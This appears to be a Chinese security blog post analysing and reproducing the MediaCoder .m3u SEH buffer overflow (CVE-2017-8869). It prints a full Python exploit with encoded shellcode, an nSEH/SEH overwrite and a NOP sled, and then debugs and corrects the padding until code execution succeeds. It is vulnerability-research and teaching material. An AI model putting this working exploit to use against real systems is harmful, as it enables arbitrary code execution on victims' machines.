<!DOCTYPE html><html class="appearance-auto" lang="zh-CN"><head><meta charset="UTF-8"><title>MEDIACODER .M3U缓冲区溢出漏洞（CVE-2017-8869）</title><meta name="description" content="May the Force be with you"><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><link rel="icon" href="/images/favicon.png"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><script src="/js/highlight.pack.js"></script><meta name="generator" content="Hexo 5.3.0"></head><body class="is-flex is-flex-direction-column"><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-space-between is-hidden-mobile"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">Fstark's 自留地</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">MEDIACODER .M3U缓冲区溢出漏洞（CVE-2017-8869）</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">点击返回顶部</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">首页</a></h3><h3 class="is-inline-block"><a href="/about">关于</a></h3><h3 class="is-inline-block"><a href="/archives">归档</a></h3></aside></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">首页</a></h3><h3 class="is-inline-block"><a href="/about">关于</a></h3><h3 class="is-inline-block"><a href="/archives">归档</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%83%8C%E6%99%AF%E6%A6%82%E8%BF%B0"><span class="toc-text">背景概述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90%E8%BF%87%E7%A8%8B"><span class="toc-text">分析过程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E7%AB%A0%E5%8F%82%E8%80%83"><span class="toc-text">文章参考</span></a></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><i class="tag post-item-tag">漏洞复现</i></a><a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><i class="tag post-item-tag">漏洞分析</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">MEDIACODER .M3U缓冲区溢出漏洞（CVE-2017-8869）</h1><time class="has-text-grey" datetime="2021-01-30T03:39:26.452Z">2021-01-30</time><article class="mt-2 post-content"><p>本文是针对Mediacoder缓冲区溢出漏洞的简要分析文章</p>
<a id="more"></a>

<h3 id="背景概述"><a href="#背景概述" class="headerlink" title="背景概述"></a>背景概述</h3><p>本来是浏览学长博客 <a target="_blank" rel="noopener" href="https://whereisk0shl.top/post/2018-06-23">MEDIACODER 0.8.43.5852 - .M3U缓冲区溢出漏洞</a> 进行的漏洞分析过程</p>
<p>实验环境为：</p>
<p>Windows xp sp3</p>
<p>Windbg</p>
<p>IDA pro</p>
<p>OD</p>
<p>MEDIACODER 软件下载：<a target="_blank" rel="noopener" href="https://www.exploit-db.com/apps/bab45ceeba55cbe48a49ead4e6787fd0-MediaCoder-0.8.45.5852.exe">https://www.exploit-db.com/apps/bab45ceeba55cbe48a49ead4e6787fd0-MediaCoder-0.8.45.5852.exe</a></p>
<h3 id="分析过程"><a href="#分析过程" class="headerlink" title="分析过程"></a>分析过程</h3><p>原文提供的poc如下所示</p>
<pre><code class="python">#!/usr/bin/python

total_buf = 5000


shellcode = (&quot;\x89\xe1\xda\xcc\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43&quot;
&quot;\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34&quot;
&quot;\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41&quot;
&quot;\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58&quot;
&quot;\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x42\x55\x50&quot;
&quot;\x45\x50\x35\x50\x53\x50\x4c\x49\x4b\x55\x46\x51\x59\x50\x55&quot;
&quot;\x34\x4c\x4b\x30\x50\x56\x50\x4c\x4b\x31\x42\x54\x4c\x4c\x4b&quot;
&quot;\x46\x32\x44\x54\x4c\x4b\x32\x52\x47\x58\x34\x4f\x58\x37\x50&quot;
&quot;\x4a\x47\x56\x50\x31\x4b\x4f\x4e\x4c\x37\x4c\x43\x51\x53\x4c&quot;
&quot;\x53\x32\x36\x4c\x51\x30\x59\x51\x58\x4f\x34\x4d\x35\x51\x48&quot;
&quot;\x47\x4a\x42\x5a\x52\x36\x32\x46\x37\x4c\x4b\x56\x32\x52\x30&quot;
&quot;\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x50\x4c\x52\x31\x32\x58\x4d&quot;
&quot;\x33\x30\x48\x33\x31\x38\x51\x46\x31\x4c\x4b\x50\x59\x31\x30&quot;
&quot;\x33\x31\x49\x43\x4c\x4b\x30\x49\x55\x48\x5a\x43\x36\x5a\x47&quot;
&quot;\x39\x4c\x4b\x30\x34\x4c\x4b\x45\x51\x39\x46\x36\x51\x4b\x4f&quot;
&quot;\x4e\x4c\x59\x51\x48\x4f\x44\x4d\x53\x31\x58\x47\x56\x58\x4d&quot;
&quot;\x30\x33\x45\x4b\x46\x54\x43\x43\x4d\x4c\x38\x47\x4b\x53\x4d&quot;
&quot;\x37\x54\x54\x35\x5a\x44\x51\x48\x4c\x4b\x30\x58\x57\x54\x35&quot;
&quot;\x51\x4e\x33\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38&quot;
&quot;\x45\x4c\x43\x31\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x35\x51\x48&quot;
&quot;\x50\x4b\x39\x51\x54\x56\x44\x46\x44\x51\x4b\x31\x4b\x43\x51&quot;
&quot;\x46\x39\x30\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x31&quot;
&quot;\x4a\x4c\x4b\x52\x32\x4a\x4b\x4c\x4d\x51\x4d\x52\x4a\x43\x31&quot;
&quot;\x4c\x4d\x4c\x45\x4f\x42\x43\x30\x55\x50\x33\x30\x30\x50\x33&quot;
&quot;\x58\x56\x51\x4c\x4b\x32\x4f\x4d\x57\x4b\x4f\x48\x55\x4f\x4b&quot;
&quot;\x4a\x50\x38\x35\x4e\x42\x31\x46\x53\x58\x49\x36\x5a\x35\x4f&quot;
&quot;\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x43\x36\x33\x4c\x35\x5a&quot;
&quot;\x4b\x30\x4b\x4b\x4d\x30\x44\x35\x33\x35\x4f\x4b\x31\x57\x44&quot;
&quot;\x53\x52\x52\x52\x4f\x33\x5a\x33\x30\x36\x33\x4b\x4f\x58\x55&quot;
&quot;\x42\x43\x45\x31\x52\x4c\x35\x33\x56\x4e\x55\x35\x54\x38\x32&quot;
&quot;\x45\x53\x30\x41\x41&quot;)

junk = &quot;http:// &quot;
junk += &quot;A&quot;*784
nseh = &quot;\xEB\x06\x90\x90&quot;
seh = &quot;\x38\x78\x01\x66&quot; # PPR - 0x66017838 - libiconv-2.dll
evil = junk + nseh + seh
evil += &quot;\x90&quot;*50 + shellcode
evil += &quot;\x90&quot;*3000

file = open(&quot;evil.m3u&quot;, &quot;wb&quot;)
file.write (evil)
file.close()</code></pre>
<p>双击后生成一个m3u文件，用<code>MediaCoder</code>打开，触发崩溃。</p>
<p>使用Windbg附加程序，发现拖入文件后断在了004306b5位置</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebtphub73j30l008sgm9.jpg" alt="image-20200430152618774"></p>
<p>再次执行出现414141，看来到了被覆盖的跳转位置，这个poc里位置需要再调一下</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebtw6ngtzj30o406tjs6.jpg" alt="image-20200430153247696"></p>
<p>参考教程中通过windbg的kb命令，回溯栈信息，还能看到入手点的上层调用函数，如下图。</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebtzynq5zj30kz07mmy0.jpg" alt="image-20200430153625478"></p>
<p>但是我在分析时，kb命令获取的信息却不太一样，应该是利用脚本需要根据利用环境进行调整的原因。</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebu0rlqgkj30k208rq3d.jpg" alt="image-20200430153711431"></p>
<p>看来没办法像原博一样，还是从第一次报错的004306b5位置开始查找原因吧</p>
<p>放在IDA里看一下这一部分，好像是一个死循环啊</p>
<pre><code class="assembly">.text:004306B0 loc_4306B0:                             ; CODE XREF: sub_430620+9Bj
.text:004306B0                 mov     al, [ecx]
.text:004306B2                 lea     ecx, [ecx+1]
.text:004306B5                 mov     [edx+ecx-1], al
.text:004306B9                 test    al, al
.text:004306BB                 jnz     short loc_4306B0</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1geby5e9w3wj30at0ehaai.jpg" alt="image-20200430180002430"></p>
<p>我们可以看出来这一部分函数a3作为畸形字符串传入，在里面将a3交给v5，随后v5在do while循环中进行连续赋值，读取赋值的终止条件是取到的值为0，并没有对长度进行限制,那也就是说只要文档里有字符就会一一读出来，很明显有安全漏洞啊</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebyiaspcpj30ky05dwek.jpg" alt="image-20200430181226364"></p>
<p>我们在OllyDbg里进行进一步的动态调试，可知读取的内容位置起始为12f380</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebyo9zxnmj30h803vt8q.jpg" alt="image-20200430181811372"></p>
<p>最终报错是因为构造的文件内容太长，把这段堆栈给完全填满了，mov指令在填充下一个时访问到了不可访问的位置（130000），最终报错。</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebyru0la5j30n108lgm2.jpg" alt="截屏2020-04-30 下午5.11.01"></p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebyrz2nj3j30nl0hwq49.jpg" alt="截屏2020-04-30 下午5.45.34"></p>
<p>总结来说就是由于对于文件的长度没有进行有效控制，从而导致后续函数处理调用畸形字符串时导致程序指针引用异常访问到了不可访问的位置，进入SEH处理，从而引发任意代码执行。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>原博中的exp没能成功利用而是直接崩溃，应该是位置没算好导致的，利用OD查看该程序SEH分布，离最近的应该是12f688，但是看原来生成的文件在堆栈里的分布正好错了一行，这是导致没有利用成功的主要原因</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebz33ujcsj30w40mpdk1.jpg" alt="截屏2020-04-30 下午4.34.19"></p>
<p>首尾减一下应该是768个A，再生成一边看看堆栈的分布，就正好对上了</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebz521tbrj30e707qt91.jpg" alt="截屏2020-04-30 下午5.05.21"></p>
<p>再看SEH的跳转地址也变对了，指向下一个SEH记录的指针（简称nseh），指示下一个seh结构的位置，此处使用“ \ xeb \ x06 \ x90 \ x90”填充，这四字节反汇编的结果是jmp 6，nop，nop三条指令，jmp 6表示跳过6个字节，刚好跳过两个nop指令和一个4字节的seh处理程序地址，然后落入nop指令区，滑行进入shellcode。</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebz6ewn40j308906kq30.jpg" alt="截屏2020-04-30 下午5.05.29"></p>
<p>整个利用过程就如下图所示</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebzqguv6cj30g807jgmb.jpg" alt="image-20200430185453204"></p>
<p>此时把文件拖入程序尝试一下，发现成功蹦出了计算器</p>
<p><img src="https://tva1.sinaimg.cn/large/007S8ZIlly1gebzscfjhgj311w0kd1aw.jpg" alt="image-20200430185641358"></p>
<h3 id="文章参考"><a href="#文章参考" class="headerlink" title="文章参考"></a>文章参考</h3><p>漏洞分析——MEDIACODER 0.8.43.5852 - .M3U缓冲区溢出漏洞 <a target="_blank" rel="noopener" href="https://ayesawyer.github.io/2019/07/03/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E2%80%94%E2%80%94MEDIACODER-0-8-43-5852-M3U%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/">https://ayesawyer.github.io/2019/07/03/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E2%80%94%E2%80%94MEDIACODER-0-8-43-5852-M3U%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/</a></p>
<p>MEDIACODER 0.8.43.5852 - .M3U缓冲区溢出漏洞</p>
<p><a target="_blank" rel="noopener" href="https://whereisk0shl.top/post/2018-06-23">https://whereisk0shl.top/post/2018-06-23</a></p>
<p>Mediacoder 0.8.43.5852-‘.m3u’（SEH）</p>
<p> <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/40148">https://www.exploit-db.com/exploits/40148</a></p>
</article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><a class="button is-default" href="/2021/01/30/macbook%E6%8D%A2%E7%A1%AC%E7%9B%98/" title="MBP839更换ssd过程记录"><i class="iconfont icon-prev mr-2 has-text-grey"></i><span class="has-text-weight-semibold">上一页: MBP839更换ssd过程记录</span></a><a class="button is-default" href="/2021/01/30/Modbus/" title="工控Modbus学习笔记（在FreeBuf原文上增改）"><span class="has-text-weight-semibold">下一页: 工控Modbus学习笔记（在FreeBuf原文上增改）</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section><article class="mt-6 comment-container"><script async repo="Haojen/Claudia-theme-blog" src="https://utteranc.es/client.js" issue-term="pathname" theme="preferred-color-scheme"></script></article></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><a title="twitter" target="_blank" rel="noopener nofollow" href="//twitter.com//"><i class="iconfont icon-twitter"></i></a><!-- Github--><a title="github" target="_blank" rel="noopener nofollow" href="//github.com/haojen"><i class="iconfont icon-github"></i></a><!-- Ins--><a title="instagram" target="_blank" rel="noopener nofollow" href="//www.instagram.com//"><i class="iconfont icon-ins"></i></a><!-- RSS--><!-- 知乎--><!-- 领英--><!-- 脸书--><a title="facebook" target="_blank" rel="noopener nofollow" href="//www.facebook.com//"><i class="iconfont icon-tian7_facebook"></i></a></section><p><span>Copyright ©</span><span> Fstark 2021</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><p>过好每一天 &verbar;&nbsp;</p><p class="is-flex is-justify-content-center"><a title="Hexo theme author" target="_blank" rel="noopener" href="https://beian.miit.gov.cn/#/Integrated/index">豫ICP备2021000187号&nbsp;</a></p></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/post.js"></script></body></html>